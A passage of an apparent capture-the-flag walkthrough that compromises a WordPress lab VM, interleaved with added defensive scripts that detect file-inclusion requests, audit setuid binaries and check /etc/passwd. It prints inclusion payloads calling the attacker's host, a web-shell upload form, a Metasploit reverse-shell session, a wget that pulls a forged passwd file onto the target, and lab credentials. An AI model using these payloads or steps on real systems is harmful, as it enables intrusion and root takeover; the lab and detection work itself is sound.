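# "../" or "..\" anywhere in the value, checked after decoding.
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')


def classify_value(value):
    """Return a reason string if one parameter value looks like an inclusion
    payload, otherwise None."""
    # parse_qsl already decoded once; decode twice more to catch %252F-style
    # double encoding (unquote is a no-op on fully decoded text).
    decoded = unquote(unquote(value))
    m = WRAPPER_RE.match(decoded)
    if m:
        return "stream wrapper " + m.group(0).lower()
    if TRAVERSAL_RE.search(decoded):
        return "path traversal"
    return None


def detect_inclusion_attempts(lines):
    """Parse combined-log lines; return (line number, parameter, reason)
    for every query parameter that classify_value flags."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash the parser
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            reason = classify_value(value)
            if reason:
                findings.append((lineno, name, reason))
    return findings


# Constructed sample: benign traffic plus the request shapes from this box.
SAMPLE_LOG = [
    '192.168.116.1 - - [26/Sep/2019:11:40:01 +0800] "GET /wordpress/ HTTP/1.1" 200 10918 "-" "Mozilla/5.0"',
    '192.168.116.1 - - [26/Sep/2019:11:45:20 +0800] "GET /wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=http://192.168.116.1:8000/shell.php HTTP/1.1" 200 0 "-" "curl/7.66.0"',
    '192.168.116.1 - - [26/Sep/2019:11:46:02 +0800] "GET /wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=data://text/plain;base64,PD9waHAgIHBocGluZm8oKTs/Pg== HTTP/1.1" 200 70210 "-" "Mozilla/5.0"',
    '192.168.116.1 - - [26/Sep/2019:11:46:30 +0800] "POST /wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://input HTTP/1.1" 200 70210 "-" "curl/7.66.0"',
    '192.168.116.1 - - [26/Sep/2019:11:45:39 +0800] "GET /wordpress/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://192.168.116.1:8000/ HTTP/1.1" 200 0 "-" "curl/7.66.0"',
    '192.168.116.1 - - [26/Sep/2019:11:47:10 +0800] "GET /wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 2557 "-" "curl/7.66.0"',
    '192.168.116.1 - - [26/Sep/2019:11:48:00 +0800] "GET /wordpress/wp-content/themes/twentysixteen/style.css?ver=5.2.3 HTTP/1.1" 200 44251 "-" "Mozilla/5.0"',
    'not a log line at all',
]

if __name__ == "__main__":
    for lineno, param, reason in detect_inclusion_attempts(SAMPLE_LOG):
        print(f"line {lineno}: parameter {param!r}: {reason}")
```

Reading the same lines from the real access.log is a one-line change, but note that on this box the attacker could not read the Apache logs, so the detector belongs on a log collector, not on the web host.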

File Upload

<form method="POST" action="http://192.168.116.138/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2019&Month=09" enctype="multipart/form-data" >
<input type="file" name="qqfile"><br>
<input type="submit" name="Submit" value="Pwn!">
</form>
  • Open it in a browser, choose the web shell to upload, then open the upload directory and request the shell; that is all.

CSRF Privilege Escalation

Admin Password: Ignite@123
Second Flag: 5DD1CC591CE1569A528E3BCF18CEEB5B

RootPassword: SWduaXRlQDEyMw==
  • The passwords are all the same.

Plugin Authenticated File Upload

  • One of the exploits above needs a password; now that I have the password, do I even still need the exploit?
msf5 exploit(unix/webapp/wp_slideshowgallery_upload) > show options 

Module options (exploit/unix/webapp/wp_slideshowgallery_upload):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.116.138 yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
VHOST no HTTP server virtual host
WP_PASSWORD [email protected] yes Valid password for the provided username
WP_USER admin yes A valid username


Exploit target:

Id Name
-- ----
0 WP SlideShow Gallery 1.4.6


msf5 exploit(unix/webapp/wp_slideshowgallery_upload) > run

[*] Started reverse TCP handler on 192.168.116.1:4444
[*] Trying to login as admin
[*] Trying to upload payload
[*] Uploading payload
[*] Calling uploaded file gxwuywll.php
[*] Sending stage (38247 bytes) to 192.168.116.138
[*] Meterpreter session 2 opened (192.168.116.1:4444 -> 192.168.116.138:41014) at 2019-09-26 18:24:09 +0800
[+] Deleted gxwuywll.php

meterpreter >
  • The story demands it, so never mind.

Root Privilege Escalation

  • Pick any session, drop into a shell, and look for SUID files.
meterpreter > shell
Process 2084 created.
Channel 0 created.
[email protected]:/var/www$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/arping
/usr/bin/wget
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/vmware-user-suid-wrapper
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping
/bin/cp
/bin/su
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
[email protected]:/var/www$
  • I see that cp and wget are in the list; both can overwrite files, so the plan is simply to replace the passwd file.
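From the defender's side, the find output above is exactly what a setuid audit should compare against a known-good list: on this box /bin/cp and /usr/bin/wget stand out because neither is setuid on a stock install. The script below is an added example, not code from the write-up or from the VM's author. EXPECTED_SUID is an assumed allow-list for Ubuntu 18.04 (plus the VMware tools wrapper) and must be tuned per host; SAMPLE_FIND_OUTPUT is a constructed subset of the lines shown above.

```python
"""Compare a host's setuid-root binaries against an expected baseline.

Added example; not part of the original write-up. EXPECTED_SUID is an
assumed allow-list for a stock Ubuntu 18.04 install and must be tuned per
host. SAMPLE_FIND_OUTPUT is constructed from the find output shown above.
"""
import subprocess

# Assumed baseline: binaries that normally carry the setuid bit on Ubuntu 18.04.
EXPECTED_SUID = frozenset({
    "/bin/fusermount", "/bin/mount", "/bin/ping", "/bin/ping6", "/bin/su",
    "/bin/umount",
    "/usr/bin/arping", "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/passwd", "/usr/bin/pkexec", "/usr/bin/sudo",
    "/usr/bin/traceroute6.iputils", "/usr/bin/vmware-user-suid-wrapper",
    "/usr/sbin/pppd",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/snapd/snap-confine",
    "/usr/lib/xorg/Xorg.wrap",
})

# Constructed sample: a subset of the `find / -perm -u=s -type f` output above.
SAMPLE_FIND_OUTPUT = """\
/usr/sbin/pppd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/arping
/usr/bin/wget
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping
/bin/cp
/bin/su
/snap/core/6350/bin/su
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/sbin/pppd
"""


def normalize(path):
    """Map /snap/core/<rev>/X to /X so the snap's private copies are judged
    by the same baseline as the host binaries."""
    parts = path.split("/")
    if len(parts) > 4 and parts[1] == "snap" and parts[2] == "core":
        return "/" + "/".join(parts[4:])
    return path


def parse_find_output(text):
    """One path per line; blank lines are ignored."""
    return [line.strip() for line in text.splitlines() if line.strip()]


def unexpected_suid(paths, baseline=EXPECTED_SUID):
    """Return the setuid paths (sorted, de-duplicated) that are not in the
    baseline; on this box that is what exposes /bin/cp and /usr/bin/wget."""
    return sorted({p for p in paths if normalize(p) not in baseline})


def audit_live_host(baseline=EXPECTED_SUID):
    """Run the same find the write-up used and audit the real result.
    Only meaningful on an actual host; permission errors are discarded."""
    proc = subprocess.run(
        ["find", "/", "-perm", "-u=s", "-type", "f"],
        stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, text=True, check=False,
    )
    return unexpected_suid(parse_find_output(proc.stdout), baseline)


if __name__ == "__main__":
    for path in unexpected_suid(parse_find_output(SAMPLE_FIND_OUTPUT)):
        print("unexpected setuid binary:", path)
```

Run against the sample it reports /bin/cp and /usr/bin/wget; run as a cron job with audit_live_host() it gives you the same signal before someone else finds it. Any binary that can write an arbitrary output path is equivalent to root when setuid, which is why a baseline diff rather than a fixed "dangerous names" list is the right check.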
[email protected]:/etc$ wget -O passwd http://192.168.116.1:8000/passwd
wget -O passwd http://192.168.116.1:8000/passwd
ERROR: could not open HSTS store. HSTS will be disabled.
--2019-09-26 11:54:08-- http://192.168.116.1:8000/passwd
Connecting to 192.168.116.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2557 (2.5K) [application/octet-stream]
Saving to: 'passwd'

passwd 100%[===================>] 2.50K --.-KB/s in 0.001s

2019-09-26 11:54:08 (2.86 MB/s) - 'passwd' saved [2557/2557]

[email protected]:/etc$ cat passwd
cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
raj:x:1000:1000:raj,,,:/home/raj:/bin/bash
mysql:x:122:128:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:124:65534::/run/sshd:/usr/sbin/nologin
kt:$1$kt$mR/jSFSDV/G0vNQ72T8cs.:0:0:root:/root:/bin/bash
[email protected]:/etc$ su kt
su kt
Password: 123

[email protected]:/etc# id
id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/etc#
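The replaced passwd file above carries two tells that a file-integrity or account audit should catch: a second account with UID 0, and a password hash stored directly in /etc/passwd instead of "x" (so /etc/shadow is never consulted). The checker below is an added example, not code from the write-up; SAMPLE_PASSWD is a constructed excerpt of the file shown above, including the planted kt line.

```python
"""Flag /etc/passwd entries that should never appear on a healthy host.

Added example; not part of the original write-up. SAMPLE_PASSWD is a
constructed excerpt of the file shown above, including the planted kt line.
"""

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
raj:x:1000:1000:raj,,,:/home/raj:/bin/bash
sshd:x:124:65534::/run/sshd:/usr/sbin/nologin
kt:$1$kt$mR/jSFSDV/G0vNQ72T8cs.:0:0:root:/root:/bin/bash
"""

# Password-field values that defer to /etc/shadow or lock the account.
SHADOWED = {"x", "*", "!", "!!"}

EXTRA_UID0 = "uid 0 but not root"
HASH_IN_PASSWD = "password hash stored in passwd (bypasses /etc/shadow)"
EMPTY_PASSWORD = "empty password field"
MALFORMED = "malformed entry"
DUPLICATE = "duplicate user name"


def audit_passwd(text):
    """Return a list of (user name, reason) findings for the given passwd text."""
    findings = []
    seen = set()
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, MALFORMED))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        try:
            uid_num = int(uid)
        except ValueError:
            findings.append((name, MALFORMED))
            continue
        if name in seen:
            findings.append((name, DUPLICATE))
        seen.add(name)
        if uid_num == 0 and name != "root":
            findings.append((name, EXTRA_UID0))
        if pw == "":
            findings.append((name, EMPTY_PASSWORD))
        elif pw not in SHADOWED:
            findings.append((name, HASH_IN_PASSWD))
    return findings


def audit_file(path="/etc/passwd"):
    """Audit a real passwd file on the live system."""
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for name, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"{name}: {reason}")
```

On the sample this reports kt twice, once for each tell. Pair it with integrity monitoring on /etc/passwd itself (mtime, hash, or an auditd watch), since the write-up shows the file being replaced wholesale in one wget call rather than edited with useradd.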

Getting the flag

[email protected]:/etc# cd /root
cd /root
[email protected]:~# ls
ls
proof.txt
[email protected]:~# cat proof.txt
cat proof.txt
_________________________________________________________________________
_____ _ _ U _____ u U _____ u _ _ ____ |
|_ " _| |'| |'| \| ___"|/ \| ___"|/ | \ |"| | _"\ |
| | /| |_| |\ | _|" | _|" <| \| |> /| | | | |
/| |\ U| _ |u | |___ | |___ U| |\ |u U| |_| |\ |
u |_|U |_| |_| |_____| |_____| |_| \_| |____/ u |
_// \\_ // \\ << >> << >> || \\,-. |||_ |
(__) (__) (_") ("_) (__) (__) (__) (__) (_") (_/ (__)_) |
|
|
!! Congrats you have finished this task !! |
|
Contact us here: |
|
Hacking Articles : https://twitter.com/rajchandel/ |
|
|
+-+-+-+-+-+ +-+-+-+-+-+-+-+ |
|E|n|j|o|y| |H|A|C|K|I|N|G| |
+-+-+-+-+-+ +-+-+-+-+-+-+-+ |
________________________________________________________________________|



[email protected]:~#